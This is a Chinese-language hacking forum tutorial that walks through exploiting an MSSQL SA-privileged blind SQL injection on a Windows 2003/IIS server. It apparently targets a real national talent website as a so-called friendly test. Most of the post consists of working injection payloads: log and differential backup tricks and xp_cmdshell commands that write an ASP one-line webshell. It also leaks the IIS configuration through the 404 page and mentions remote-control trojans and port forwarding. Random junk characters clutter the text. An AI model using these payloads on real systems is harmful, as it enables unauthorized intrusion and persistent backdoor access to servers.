sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————

* H# ]3 S4 x7 m5 E( o
                                                             欢迎高手访问指导，欢迎新手朋友交流学习。
+ [/ W0 [8 H( D$ u! e% Z
                                                                 
) m6 w# L, C& c                                                                 
2 b$ a) [3 o7 V7 l) r                                                                  论坛： http://www.90team.net/
# Y% J/ v3 {% z" P8 h


友情检测国家人才网

- \+ d0 W( z$ K4 i5 H2 V5 W. p
内容：MSSQL注入SA权限不显错模式下的入侵


' ~/ z# i' r1 V一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。
4 P7 w7 w( l3 |4 D: }0 d
. h( V* _: n# N* p/ j3 u我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。

( F- \5 B& |6 }, ]6 m5 @+ X. S
这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
+ j' d- k# S5 E3 ^8 d4 ]8 I  }' ~/ l
* R' H# ?  N# [/ W7 I# X& Y思路：

% n; M' K+ n& p( `9 K! a首先：

7 I0 j! D+ y1 s通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。

9 \4 C# z. r3 }* x& {1.日志备份获得Webshell
: b, `+ F$ @! Y# x) h2 w) d7 H
2.数据库差异备份获得Webshell

4.直接下载免杀远控木马。

5.直接下载LCX将服务器端口转发出来

6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
) y7 S" `; s2 a4 @6 Q5 K


在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，
# |( ]$ C/ x  ?
我直接演示后面一个方法
8 _7 F" y( X9 a, _# w0 a+ v& m
7 q! a5 k! H1 H8 x! [
1 S7 I; a. _: R/ y分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL

- }9 E, s$ P  R* o5 C7 \
8 {" e) Y, A, }* ?; g8 N5 ^

3 }8 ?$ y8 @/ I; I% Z◆日志备份：
& y! f; q1 G5 }0 v, f
5 e0 q; A# K4 L1 _; |# X/ H
1. 进行初始备份
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
* r) @; r: L" O# G8 u: y
8 Y7 m  m* U; i- a6 L# B4 C2. 插入数据
! @1 a* c6 C; r9 Y4 F' W0 W;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
7 R/ X; p; `% {7 t  
- x3 c, h( b  q1 f0 a3. 备份并获得文件，删除临时表
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
) M0 Y9 W: j, P+ Z
6 P& E( l  w: ^* u9 {/ i( c, P' M
6 ~7 o$ ?0 d8 h1 c
◆数据库差异备份
4 I) |" [, V( C5 O) W
; t* |1 ?$ Z4 ?5 ^1 [! v（1. 进行差异备份准备工作
" z3 A+ s9 C: @& F- b" \# E& ^8 `5 N
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
  |) J$ d! ^  H  n# O% I, s
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码


: Z. Y' h3 q7 ^3 z' a( ?（2. 将数据写入到数据库
3 H0 g' _" }  V1 m5 A& ~* t5 \;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
  U* f0 j- Z6 I) z3 k9 y
  o0 Y0 K3 [! X% \: m0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
. h8 R& c+ E" N* A4 T
' q  V9 N% r8 d; _+ Z3. 备份数据库并清理临时文件

- z' R, b6 y0 a2 ]* X# F;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--

0x633A5C746573742E617370  为 c:\test.asp  删除临时文件

& \, Z$ Y$ F) w5 H! x. [. ?9 d
' g8 Z6 n% g3 O" T) M$ S9 x
( u( i. C' X0 d5 c. x6 i. F+ d用^转义字符来写ASP(一句话木马)文件的方法:   

1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--

2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
' U9 v5 @" |5 L9 |6 x
( ^+ j( i# S  H# ^* R( i读取IIS配置信息获取web路径

     
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
4 B+ v, F4 v* ^8 t+ j7 a% E0 H
2 r2 \2 }/ A! f$ z/ w6 T* T! J执行命令
     
7 k9 m' U+ V+ i- X     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
% }1 S) u( q9 @( L6 U& N





2 c2 C! i* c% d/ \6 w- f

! ]0 E. P4 f. T. {- z8 B' J
- u9 Q* b& D6 d0 L5 O

( B6 W! K4 J/ [7 r





+ }) y& U5 m, V# J2 f

+ V) I. _: Z) p# M1 N
, @$ \8 l/ n1 y5 w) i! p


4 I. k+ V$ Q4 O/ A. @6 V( ~( G
4 N/ x  Q2 o3 b5 r" ]( U: I9 b+ |

) Z/ C& H# }" W6 _( [



) j/ a" V5 S+ {9 y: R/ J
" a$ F* c! F; Q$ J
5 m! r1 B; v( U" R
9 s, W% l' q* C- z0 P% Z, N  T


; W, {; N0 s. n8 N3 O
0 f4 I  _9 Z3 g2 M- V
+ s6 d; T% V( i, S: z- r  D
& W/ W* x4 [2 G" {6 V
  l/ {9 i- k5 D* X
) e3 F3 l- @& F( Z: M) T

8 ~6 ^/ q; T5 z9 O

2 H$ H" [: h5 \, N: k8 U


% L* P  h+ E5 n+ L! a) F; ^